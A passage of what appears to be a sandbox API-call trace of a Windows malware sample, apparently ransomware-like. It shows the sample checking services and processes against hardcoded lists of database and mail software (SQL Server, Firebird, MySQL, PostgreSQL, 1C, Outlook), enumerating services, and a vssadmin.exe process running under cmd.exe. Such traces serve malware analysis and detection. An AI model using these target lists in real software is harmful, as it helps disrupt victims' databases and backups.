(lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0265.294] lstrlenW (lpString="RpcEptMapper") returned 12 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.294] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0265.294] lstrlenW (lpString="RpcSs") returned 5 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0265.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0265.294] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0265.294] lstrlenW (lpString="SamSs") returned 5 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0265.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0265.294] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0265.294] lstrlenW (lpString="Schedule") returned 8 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0265.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0265.294] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0265.294] lstrlenW (lpString="SENS") returned 4 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0265.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0265.295] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0265.295] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0265.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0265.295] lstrlenW (lpString="ShellHWDetection") returned 16 [0265.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.295] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0265.295] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0265.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0265.295] lstrlenW (lpString="Spooler") returned 7 [0265.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0265.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0265.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0265.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0265.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0265.295] lstrlenW (lpString="Themes") returned 6 [0265.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0265.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0265.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0265.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0265.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0265.295] lstrlenW (lpString="UxSms") returned 5 [0265.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0265.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0265.295] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0265.295] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0265.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0265.295] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x598a58 | out: hHeap=0x4a0000) returned 1 [0265.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0265.296] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.297] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.297] lstrlenW (lpString="System") returned 6 [0265.297] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0265.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0265.297] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.298] lstrlenW (lpString="smss.exe") returned 8 [0265.298] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0265.298] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.298] lstrlenW (lpString="csrss.exe") returned 9 [0265.298] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.298] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.298] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.298] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.298] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.298] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.299] lstrlenW (lpString="wininit.exe") returned 11 [0265.299] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0265.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0265.299] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.299] lstrlenW (lpString="csrss.exe") returned 9 [0265.299] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.299] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.299] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.299] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.299] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.300] lstrlenW (lpString="winlogon.exe") returned 12 [0265.300] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0265.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0265.300] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.300] lstrlenW (lpString="services.exe") returned 12 [0265.300] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0265.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0265.300] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.301] lstrlenW (lpString="lsass.exe") returned 9 [0265.301] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0265.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0265.301] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0265.301] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0265.301] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0265.301] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0265.301] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0265.301] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0265.301] lstrlenW (lpString="lsm.exe") returned 7 [0265.301] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0265.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0265.301] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0265.301] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0265.301] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0265.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0265.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0265.302] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.302] lstrlenW (lpString="svchost.exe") returned 11 [0265.302] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.302] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.302] lstrlenW (lpString="svchost.exe") returned 11 [0265.302] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.302] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.303] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.303] lstrlenW (lpString="svchost.exe") returned 11 [0265.303] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.303] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.303] lstrlenW (lpString="svchost.exe") returned 11 [0265.303] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.303] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.304] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.304] lstrlenW (lpString="svchost.exe") returned 11 [0265.304] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.304] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.304] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.304] lstrlenW (lpString="audiodg.exe") returned 11 [0265.304] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0265.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0265.305] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0265.305] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0265.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0265.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0265.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0265.305] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.305] lstrlenW (lpString="svchost.exe") returned 11 [0265.305] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.305] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0265.305] lstrlenW (lpString="userinit.exe") returned 12 [0265.306] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0265.306] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0265.306] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.306] lstrlenW (lpString="explorer.exe") returned 12 [0265.306] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0265.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0265.306] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0265.306] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0265.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0265.306] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.307] lstrlenW (lpString="dwm.exe") returned 7 [0265.307] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.307] lstrlenW (lpString="svchost.exe") returned 11 [0265.307] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0265.307] lstrlenW (lpString="agent1c.exe") returned 11 [0265.307] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.308] lstrlenW (lpString="spoolsv.exe") returned 11 [0265.308] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0265.308] lstrlenW (lpString="reader_sl.exe") returned 13 [0265.308] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0265.308] lstrlenW (lpString="dllhost.exe") returned 11 [0265.308] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0265.309] lstrlenW (lpString="taskhost.exe") returned 12 [0265.309] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.309] lstrlenW (lpString="svchost.exe") returned 11 [0265.309] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0265.309] lstrlenW (lpString="cmd.exe") returned 7 [0265.309] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0265.309] lstrlenW (lpString="conhost.exe") returned 11 [0265.309] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0265.310] lstrlenW (lpString="vssadmin.exe") returned 12 [0265.310] Process32NextW (in: hSnapshot=0x1b0, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0265.310] CloseHandle (hObject=0x1b0) returned 1 [0265.310] Sleep (dwMilliseconds=0x1f4) [0265.892] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42759a8 [0265.951] EnumServicesStatusExW (in: hSCManager=0x42759a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0265.952] GetLastError () returned 0xea [0265.952] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa08) returned 0x4eee78 [0265.952] EnumServicesStatusExW (in: hSCManager=0x42759a8, InfoLevel=0x0, 